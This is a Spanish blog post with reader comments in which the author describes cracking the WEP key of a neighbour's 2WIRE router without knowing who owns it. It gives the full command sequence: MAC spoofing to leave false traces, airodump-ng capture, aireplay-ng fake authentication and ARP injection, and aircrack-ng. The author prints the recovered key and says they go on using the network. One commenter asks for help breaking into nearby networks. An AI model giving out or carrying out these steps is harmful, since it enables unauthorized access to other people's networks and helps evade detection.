Rumor verdadero

Un nuevo año ha comenzado y es la oportunidad de darle cabida a un nuevo reto.

Escuché que era posible hackear las redes inalámbricas protegidas con clave WEP especialmente las de infinitum y con modem inalámbrico 2WIRE.

Todo inicio con una búsqueda en google al respecto y lo sorprendente es que muchos afirmaban que era posible, así que no hubo mas que seguir los pasos de los que van adelante.

Lo primero que hice fue bajar desde el sitio oficial la versión beta 3 de Linux BackTrack como formato iso y luego quemarla en un CD. Por cierto, baje el iso en casa de Landy, pues ella tiene conexión de banda ancha, yo solo tengo dial-up (gracias Lan).

Despues de quemar el iso, inicié mi laptop con el CD adentro y el autorranque eligiendo KDE como entorno gráfico hizo el resto. Una vez iniciado el sistema Linux Live de BackTrack, los pasos a seguir son los siguientes:

En una consola, ejecuté el comando: ifconfig

Observé que mi tarjeta inalámbrica estaba asociada al dispositivo: eth0

Cambié la dirección MAC de mi tarjeta inalámbrica por una más falsa que un billete de 10 pesos (00:11:22:33:44:55); esto se hace por prevención y para dejar huellas falsas en el router en caso de fallar la inyección de datos al momento de intentar aprovechar su vulnerabilidad. El comando fue:
macchanger -m 00:11:22:33:44:55 eth0
-m 00:11:22:33:44:55
es la dirección MAC que se quiere asignar al dispositivo de red
eth0 es mi dispositivo de red

Después, inicié el dispositivo de red mediante el comando:
ifconfig eth0 up

Luego, inicié el asistente para redes inalámbricas para ver qué redes había en mi entorno (K->Internet-> Wireless Assistant), cabe mencionar que cerca de mi casa hay dos acces point (AP) que no se a quien pertenezcan y ambos están protegidos por clave WEP, pero solo uno de ellos es de infinitum y transmite su señal en el canal 6, su ESSID es… hum… digamos que 2WIRE444 y es precisamente sobre la que gira este post.

A continuación, comenzó lo bueno, es decir el ataque directo al router, primero obteniendo la dirección MAC del AP y luego mediante la escucha de la cantidad de trafico y paquetes que se transmiten, esto mediante el comando:
airodump-ng -w 2WIRE444 -c 6 eth0
-w 2WIRE444
es para que escriba en un archivo los IV’s de la red 2WIRE444
-c 6 es el canal por el cual transmite la señal el router
eth0 es mi dispositivo de red

Ahora, lo conveniente es abrir otra consola para crear una asociacion entre el router y mi lap, esto es proporcionando la direccion MAC del AP y mi direccion MAC (que es mas falsa que un billete de 10 pesos) mediante el comando:
aireplay-ng -1 0 -e 2WIRE444 -a 00:34:14:B9:E1:20 -h 00:11:22:33:44:55 eth0
-1 0
es el tiempo de retraso en la autenticación falsa con el AP
-e 2WIRE444 es el identificador de la red (ESSID)
-a 00:34:14:B9:E1:20 establece la dirección MAC del AP
-h 00:11:22:33:44:55 es la dirección MAC de mi host
eth0 es mi dispositivo de red

Si todo va bien, aireplay muestra el mensaje “Association sucessful :-)”

Después, viene la inyección de tráfico en el AP, esto es mediante el comando:
aireplay-ng -3 -b 00:34:14:B9:E1:20 -h 00:11:22:33:44:55 eth0
-3
es para la respuesta estandar a las solicitudes ARP
-b 00:34:14:B9:E1:20 es la dirección MAC del AP (BSSID)
-h 00:11:22:33:44:55 es la dirección MAC de mi host
eth0 es mi dispositivo de red

En la primera consola (en donde se ejecutó airodump) se observará que la cantidad de datos en el router en cuestión (2WIRE444) comienza a incrementar rápidamente, se recomienda que al menos llegue a 5000 IVs (mirar bajo la columna “# Data”) antes de proseguir.

Una vez alcanzado (por lo menos) los 5000 IVs, es hora de hackear la clave WEP del AP pero para eso, primero hay que abrir otra consola; lo primero que se debe hacer, es ver el nombre del archivo .cap que se ha generado durante la inyección de datos, esto se hace mediante el comando:
ls
Una vez que se ha visto el nombre del archivo con extensión .cap (en mi caso 2WIRE444-02.cap) entonces se ejecuta el comando:
aircrack-ng 2WIRE444-02.cap

Después aparece una lista con las redes disponibles enumeradas desde el 1 hasta N. Aircrack pide el numero que le corresponde al objetivo a hackear, en mi caso le correspondía el #1 al 2WIRE444 por lo tanto, lo escribí y di enter.

Un par de minutos después, la clave WEP fue revelada:
KEY FOUND! [ 4A:21:77:E4:D5 ]

Y eso es todo, ahora cuando deseo conectar mi lap u otro dispositivo inalámbrico a ese router (que sigo sin saber de quien es) utilizo la clave que obtuve (sin los dos puntos que tiene entre cada cifra hexadecimal), es decir empleo la clave: 4a2177e4d5 en el momento en que se me solicita la clave WEP de acceso.

Al final creo que la frase de “El conocimiento es libertad y poder” es totalmente cierta y por otro lado, es evidente que la seguridad de un sistema basado en cifrado WEP puede ser comprometido con relativa sencillez.

Anuncios

6 pensamientos en “Rumor verdadero

  1. esto hasta es una práctica en una clase en la Fac. de Ingienería :) no digo que profe la da…jejeje por cierto valar feliz año nuevo espero que sea un muy buen año para ambos…y perdona por no contestar tu mail la verdad me desaparecí casi todo Diciembre ya no quería saber absolutamente nada de compus y menos del trabajo… :) salu2.

  2. Esto lo sabe cualquiera, lo encuetras en la red, almenos pon la fuente de donde lo sacastes

  3. Hola la verdad me gusta este asunto de los computadores…. tengo internet movil de comcel Colombia, pero es una porkeria!!! que servicio tan malo y ahora mi hermano tambien tiene portatil pero este internet solo se puede conectar uno al tiempo…. el caso es ke en el apto. donde estamos detectamos varias redes inalambricas pero todos con clave, he visto algunas cosas sobre eso pero pues la verdad me parece tan complicado o no se…. me gustaria que me hablaran en terminos castos porque pues no se mucho de esto apenas estoy aprendiendo y veo unos terminos que jummmm quedo en las mismas. de ante ,ano muchas gracias y espero me ayuden

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s